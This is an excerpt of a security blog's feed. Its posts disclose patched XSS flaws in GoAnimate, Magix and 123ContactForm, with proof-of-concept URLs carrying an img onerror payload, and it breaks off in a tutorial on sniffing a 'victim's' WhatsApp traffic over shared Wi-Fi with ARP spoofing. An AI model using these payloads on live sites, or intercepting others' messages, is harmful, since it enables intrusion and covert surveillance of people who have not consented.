&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;&lt;b&gt;FOCSoft.BlogSpot.Com&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;
&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; line-height: 20px;&quot;&gt;Internet Explorer POC :-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-ZQGIV2tPYIY/UyKzQmav5sI/AAAAAAAAADw/x4RXFYUg640/s1600/Screenshot_2.jpg&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;205&quot; src=&quot;http://3.bp.blogspot.com/-ZQGIV2tPYIY/UyKzQmav5sI/AAAAAAAAADw/x4RXFYUg640/s280/Screenshot_2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;&lt;b&gt;FOCSoft.BlogSpot.Com&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;font-family: PT Sans,Arial,Helvetica,sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: PT Sans,Arial,Helvetica,sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; line-height: 20px;&quot;&gt;&lt;span&gt;&lt;span style=&quot;font-family: Verdana,sans-serif; line-height: 18.2px;&quot;&gt;Conclusion:-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;This
 vulnerability has been confirmed and patched by GoAnimate Security 
Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;GoAnimate Hall of Fame:-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Verdana,sans-serif; font-size: xx-small; line-height: 20px;&quot;&gt;&lt;span style=&quot;line-height: 18.200000762939453px;&quot;&gt;&lt;a href=&quot;http://goanimate.com/video-maker-tips/security/&quot;&gt;http://goanimate.com/video-maker-tips/security/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Verdana,sans-serif; font-size: xx-small; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-2cKBFFHGpZQ/UyK0LK_HrUI/AAAAAAAAAD4/ituBKrseJOU/s1600/Screenshot_1.png&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;211&quot; src=&quot;http://1.bp.blogspot.com/-2cKBFFHGpZQ/UyK0LK_HrUI/AAAAAAAAAD4/ituBKrseJOU/s400/Screenshot_1.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;&lt;b&gt;FOCSoft.BlogSpot.Com&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Verdana,sans-serif; font-size: xx-small; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/5938438804409137431/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/GoAnimate-XSS.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/5938438804409137431'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/5938438804409137431'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/GoAnimate-XSS.html' title=' Cross Site Scripting (XSS) Found in GoAnimate - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-rQAmBJN-lAk/UyKzP-_mJLI/AAAAAAAAADo/ww7ZHSQS2ag/s72-c/Screenshot_1.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-4630946192052220523</id><published>2014-03-15T14:42:00.003+05:00</published><updated>2014-03-15T14:42:41.879+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><title type='text'> Cross Site Scripting (XSS) Found in Magix  - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;


&lt;span style=&quot;font-family: Verdana, sans-serif; font-size: large; line-height: 18.200000762939453px;&quot;&gt;Description:-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; font-size: small;&quot;&gt;&lt;br style=&quot;line-height: 18.200000762939453px;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;An independent vulnerability researcher has discovered a
 Cross-Site Scripting (XSS) vulnerability&amp;nbsp;in&amp;nbsp;Magix Website 
www.catooh.com, which can be exploited by an attacker to conduct XSS 
attacks.&lt;/span&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;br /&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; font-size: large; line-height: 18.200000762939453px;&quot;&gt;Proof of concept:-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;a href=&quot;http://www.catooh.com/us/sys/id/Katalog/area/8039/%22/index.php?resize=0&amp;amp;popid=10&amp;amp;part=body&amp;amp;mediaId=%22%27%3Cimg%20src=x%20onerror=prompt%281%29%3E&quot; target=&quot;_blank&quot;&gt;http://www.catooh.com/us/sys/id/Katalog/area/8039/&quot;/index.php?resize=0&amp;amp;popid=10&amp;amp;part=body&amp;amp;mediaId=%22%27%3Cimg%20src=x%20onerror=prompt%281%29%3E&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-3jgSv-D8LYE/UyHUiSPNCuI/AAAAAAAAADQ/O5Pjf_801UU/s1600/Screenshot_1.png&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot; Cross Site Scripting (XSS) Found in Magix  - FOCSoft&quot; border=&quot;0&quot; height=&quot;204&quot; src=&quot;http://2.bp.blogspot.com/-3jgSv-D8LYE/UyHUiSPNCuI/AAAAAAAAADQ/O5Pjf_801UU/s400/Screenshot_1.png&quot; title=&quot; Cross Site Scripting (XSS) Found in Magix  - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;FOCSoft.BlogSpot.Com&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;
&lt;span style=&quot;font-family: &#39;PT Sans&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;Conclusion:-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;This
 vulnerability has been confirmed and patched by Magix Security Team.&amp;nbsp;I 
would like to thank them for their quick response to my report.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;Magix Hall of Fame:-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;a href=&quot;http://research.magix.com/&quot;&gt;http://research.magix.com/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana,sans-serif; font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-CQxp5AMPh0w/UyHVart4pJI/AAAAAAAAADY/hi6gzN7kJ84/s1600/Screenshot_1.png&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot; Cross Site Scripting (XSS) Found in Magix  - FOCSoft&quot; border=&quot;0&quot; height=&quot;210&quot; src=&quot;http://4.bp.blogspot.com/-CQxp5AMPh0w/UyHVart4pJI/AAAAAAAAADY/hi6gzN7kJ84/s400/Screenshot_1.png&quot; title=&quot; Cross Site Scripting (XSS) Found in Magix  - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;FOCSoft.BlogSpot.Com&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/4630946192052220523/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/Magix-XSS.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4630946192052220523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4630946192052220523'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/Magix-XSS.html' title=' Cross Site Scripting (XSS) Found in Magix  - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-3jgSv-D8LYE/UyHUiSPNCuI/AAAAAAAAADQ/O5Pjf_801UU/s72-c/Screenshot_1.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-4240776700507022048</id><published>2014-03-15T14:32:00.003+05:00</published><updated>2014-03-15T14:32:47.518+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><title type='text'> Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b style=&quot;font-family: Verdana, sans-serif; font-size: x-large; line-height: 18.200000762939453px;&quot;&gt;Description:-&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br style=&quot;line-height: 18.200000762939453px;&quot; /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;Team_CC, An independent vulnerability researcher has discovered a
 Cross-Site Scripting (XSS) vulnerability&amp;nbsp;in&amp;nbsp;123contactform.com, which 
can be exploited by an attacker to conduct XSS attacks.&lt;/span&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;br /&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b style=&quot;font-family: Verdana, sans-serif; font-size: x-large; line-height: 18.200000762939453px;&quot;&gt;Proof of concept:-&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;b style=&quot;font-family: Verdana, sans-serif; font-size: x-large; line-height: 18.200000762939453px;&quot;&gt;&lt;br /&gt;&lt;/b&gt;
&lt;a href=&quot;http://www.123contactform.com/index.php?domain=1%3Cimg%20src=x%20onerror=prompt%281%29%3E&amp;amp;module=login&amp;amp;p=new_user_validate&amp;amp;plan=0&amp;amp;sid=1v3di81f8htapinfjt2k0es3b5&amp;amp;u_openidtype=1&quot;&gt;&lt;span style=&quot;line-height: 18.200000762939453px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif;&quot;&gt;http://www.123contactform.com/index.php?domain=1%3Cimg%20src=x%20onerror=prompt%281%29%3E&amp;amp;module=login&amp;amp;p=new_user_validate&amp;amp;plan=0&amp;amp;sid=1v3di81f8htapinfjt2k0es3b5&amp;amp;u_openidtype=1&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;span style=&quot;line-height: 18.200000762939453px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-xb_38tIWLuk/UweHxCaKJXI/AAAAAAAAACs/87Ma7i5jYR0/s1600/Screenshot_1.jpg&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot; Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft&quot; border=&quot;0&quot; height=&quot;191&quot; src=&quot;http://1.bp.blogspot.com/-xb_38tIWLuk/UweHxCaKJXI/AAAAAAAAACs/87Ma7i5jYR0/s400/Screenshot_1.jpg&quot; title=&quot; Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: #f4cccc;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;FOCSoft.BlogSpot.Com&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;span&gt;&lt;span style=&quot;line-height: 18.200000762939453px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;line-height: 18.200000762939453px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;span&gt;&lt;b style=&quot;font-family: Verdana,sans-serif; line-height: 18.2px;&quot;&gt;Conclusion:-&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;b style=&quot;font-size: x-large;&quot;&gt;&lt;br style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;/b&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;This
 vulnerability has been confirmed and patched by 123ContactForm Security
 Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;span&gt;&lt;span style=&quot;font-family: Verdana,sans-serif; line-height: 18.2px;&quot;&gt;&lt;b&gt;123ContactForm Hall of Fame:-&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;&lt;a href=&quot;http://www.123contactform.com/security-acknowledgements.htm&quot;&gt;http://www.123contactform.com/security-acknowledgements.htm&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-LBWqPQSOA6Y/UweIY90Hc4I/AAAAAAAAAC0/4FSm7oWabvM/s1600/Screenshot_2.jpg&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot; Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft&quot; border=&quot;0&quot; height=&quot;180&quot; src=&quot;http://1.bp.blogspot.com/-LBWqPQSOA6Y/UweIY90Hc4I/AAAAAAAAAC0/4FSm7oWabvM/s400/Screenshot_2.jpg&quot; title=&quot; Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: #f4cccc;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;FOCSoft.BlogSpot.Com&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/4240776700507022048/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/123ContactForm-XSS.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4240776700507022048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4240776700507022048'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/123ContactForm-XSS.html' title=' Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-xb_38tIWLuk/UweHxCaKJXI/AAAAAAAAACs/87Ma7i5jYR0/s72-c/Screenshot_1.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-4686174599614814764</id><published>2014-03-15T07:32:00.004+05:00</published><updated>2014-03-15T07:32:51.059+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><title type='text'>WhatsApp Sniffer, WhatsApp Hacking - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;
&lt;h4&gt;
1. WhatsApp Sniffer&lt;/h4&gt;
WhatsAppSniffer is a tool for root&amp;nbsp;terminals&amp;nbsp;to read WhatsApp 
conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the 
conversations, pictures / videos and&amp;nbsp;coordinates&amp;nbsp;that aresent 
or&amp;nbsp;received&amp;nbsp;by an Android phone, iPhone or Nokia on the same WIFI 
network. It has not been tested with W indows Phone&amp;nbsp;terminals. It can’t 
read the messages written or&amp;nbsp;received&amp;nbsp;by the BlackBerry’s, as they 
use&amp;nbsp;their own&amp;nbsp;servers and not WhatsApp’s.&lt;span id=&quot;more-154&quot;&gt;&lt;/span&gt;&lt;br /&gt;
This application&amp;nbsp;is designed to demonstrate that the security of 
WhatsApp’s&amp;nbsp;communications&amp;nbsp;is null. WhatsAppSniffer just use the TCPDump 
program which reads all the WIFI network packets and filters those which
 has origin or destination WhatsApp’s servers. All messages are in plain
 text, so it does not decrypt anything, complying fully with the legal 
terms of WhatsApp (3.C: “While we do not disallow the use of sniffers 
Such as Ethereal, tcpdump or HttpWatch in general, Any we do going 
efforts to disallow reverse-engineer our system, our protocols, or 
explore outside the boundaries of the ordinary requests made by clients 
WhatsApp …. “)&lt;br /&gt;
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional)&lt;h4&gt;
&amp;nbsp;Requirements&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;A&amp;nbsp;&lt;a href=&quot;http://en.wikipedia.org/wiki/Android_rooting&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Rooted Android Device&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Your Victim Should Use Same Wi-Fi Through Which you are connected.&lt;/li&gt;
